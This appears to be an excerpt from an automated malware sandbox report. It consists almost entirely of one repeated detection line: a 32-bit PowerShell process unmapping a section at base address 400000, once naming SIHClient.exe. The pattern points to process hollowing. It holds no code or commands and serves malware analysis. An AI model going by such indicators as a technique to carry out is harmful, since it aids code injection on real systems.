Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\System32\SIHClient.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
